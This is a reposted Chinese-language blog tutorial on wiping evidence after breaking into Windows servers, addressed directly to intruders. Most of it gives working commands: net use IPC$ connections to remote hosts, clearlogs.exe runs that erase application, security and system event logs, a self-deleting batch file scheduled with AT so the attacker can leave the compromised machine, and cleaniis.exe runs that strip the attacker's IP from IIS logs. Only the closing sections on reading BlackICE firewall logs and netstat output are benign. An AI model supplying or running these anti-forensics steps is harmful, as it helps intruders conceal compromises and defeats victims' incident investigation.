清理你入侵后的三個重要痕跡
應用程序日志、
安全日志、
系統(tǒng)日志、
DNS日志默認位置：%systemroot%system32config，默認文件大小512KB，管理員都會改變這個默認大小。安全日志文件：%systemroot%system32configSecEvent.EVT
系統(tǒng)日志文件：%systemroot%system32configSysEvent.EVT
應用程序日志文件：%systemroot%system32configAppEvent.EVT
FTP日志默認位置：%systemroot%system32logfilesmsftpsvc1，默認每天一個
WWW日志默認位置：%systemroot%system32logfilesw3svc1，默認每天一個日志

以上日志在注冊表里的鍵： 應用程序日志，安全日志，系統(tǒng)日志，DNS服務器日志，
它們這些LOG文件在注冊表中的：
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

鑰匙（表示成功）和鎖（表示當用戶在做什么時被系統(tǒng)停止）。接連四個鎖圖標，表示四次失敗審核，事件類型是帳戶登錄和登錄、注銷失敗

怎樣刪除這些日志： 通過上面，得知日志文件通常有某項服務在后臺保護，除了系統(tǒng)日志、安全日志、應用程序日志等等，它們的服務是Windos2000的關鍵進程，而且與注冊表文件在一塊，當Windows2000啟動后，啟動服務來保護這些文件，所以很難刪除.

下面就是很難的安全日志和系統(tǒng)日志了，守護這些日志的服務是Event Log，試著停掉它！ D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務無法接受請求的"暫停" 或"停止" 操作。
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思

===================================
1.系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe

使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>

?????? -app = 應用程序日志
?????? -sec = 安全日志
?????? -sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然后開始清除: 方法?
clearlogs \ip -app 這個是清除遠程計算機的應用程序日志
clearlogs \ip -sec 這個是清除遠程計算機的安全日志
clearlogs \ip -sys 這個是清除遠程計算機的系統(tǒng)日志

b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除. 方法:

　

clearlogs -app 這個是清除遠程計算機的應用程序日志
clearlogs -sec 這個是清除遠程計算機的安全日志
clearlogs -sys 這個是清除遠程計算機的系統(tǒng)日志

安全日志已經(jīng)被清除.Success: The log has been cleared 成功.

為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務. 讓自動運行. 之后你就可以離開你的肉雞了.
例如建立一個 c.bat

rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束

在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統(tǒng)日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出

用AT命令. 建立一個計劃任務. 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法

AT 時間 c:c.bat

之后你就可以安全離開了. 這樣才更安全一點.

===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數(shù)

什么意思呢？？我來給大家舉個例子吧：
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄. -----推薦使用這種方法

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
這個表示清除這個目錄里面的所以的日志

c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 這個路徑可以改變
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 這個路徑可以改變

這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑 再來看一下
我們的ip(192.168.0.1)已經(jīng)沒有了.
已經(jīng)全部清空. 同樣這個也可以建立批處理. 方法同上面的那個.

===================================
3.清除歷史記錄及運行的日志:
cleaner.exe
直接運行就可以了.

===================================
4.察看blackice的日志.
這個地方我們可以清除的看到 防火墻的日志.

這個表示 有人發(fā)過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過端口 80 掃描iis
病毒 nimda
這里需要很多的計算機協(xié)議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機

count 代表次數(shù) intruder 是對方的ip event 是通過什么方式(協(xié)議) 掃描或者想入侵的
time表示時間

5.===================================
netstat -an 表示什么意思?
使用這個命令可以察看到和本機的所有的連接.

Proto Local Address?????????? Foreign Address?????? State
協(xié)議 本地端口及IP地址??????? 遠程端口及IP地址??? 狀態(tài)

LISTENING 監(jiān)聽狀態(tài) 表示等待對方連接

ESTABLISHED 正在連接著.

TCP 協(xié)議是TCP

UDP 協(xié)議是UDP

TCP???? 192.168.0.10:1115??? 61.186.97.54:80?????? ESTABLISHED
這個表示 利用tcp協(xié)議 本機ip(192.168.0.10)通過端口:1115 和遠程ip(61.186.97.54)端口:80連接
80端口 表示 http 就是你在訪問這個網(wǎng)站.

一般情況下遠程ip的端口: 80 21 8000 這個都是正常的. 如果是別的 就可以看一下你的計算機了.

轉載于:https://www.cnblogs.com/yangkai-cn/archive/2012/10/20/4017402.html

總結

以上是生活随笔為你收集整理的清理你入侵后的三个重要痕迹的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。